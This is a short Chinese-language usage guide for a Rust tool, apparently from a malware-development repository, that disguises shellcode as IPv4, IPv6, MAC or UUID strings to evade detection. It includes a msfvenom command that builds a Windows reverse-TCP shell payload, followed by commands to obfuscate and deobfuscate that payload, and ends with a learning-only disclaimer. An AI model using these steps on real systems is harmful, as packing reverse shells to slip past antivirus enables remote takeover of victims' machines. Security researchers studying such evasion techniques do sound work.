使用此代码,您可以使用 Ipv4、Ipv6、MAC、UUiD 格式对 shellcode 进行混淆和反混淆。

用途

出于安全原因。我正在删除 payload.bin。你自己生成 .bin...!

例子:

msfvenom -p windows/shell/reverse_tcp lhost=eth0 lport=4444 -f raw -o payload.bin

命令格式

cargo run -- -f <file> -t <technique> -o <operation>

只需运行该程序即可查看用法

cargo run

混淆有效载荷。

cargo run -- -f .\payload.bin -t ipv4 -o obfuscate

对payload进行反混淆

cargo run -- -f .\obfuscated_ipv4.txt -t ipv4 -o deobfuscate

所有用途

混淆命令

使用 IPv4 进行混淆

cargo run -- -f .\payload.bin -t ipv4 -o obfuscate

使用 IPv6 进行混淆

cargo run -- -f .\payload.bin -t ipv6 -o obfuscate

使用 MAC 进行混淆

cargo run -- -f .\payload.bin -t mac -o obfuscate

使用 UUID 进行混淆

cargo run -- -f .\payload.bin -t uuid -o obfuscate

反混淆命令

使用 IPv4 进行反混淆

cargo run -- -f .\obfuscated_ipv4.txt -t ipv4 -o deobfuscate

使用 IPv6 进行反混淆

cargo run -- -f .\obfuscated_ipv6.txt -t ipv6 -o deobfuscate

使用 MAC 进行反混淆

cargo run -- -f .\obfuscated_mac.txt -t mac -o deobfuscate

使用 UUID 进行反混淆

cargo run -- -f .\obfuscated_uuid.txt -t uuid -o deobfuscate
Shellcode Obfuscation and Deobfuscation Technique

https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/obfuscation

免责声明

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本平台和发布者不为此承担任何责任。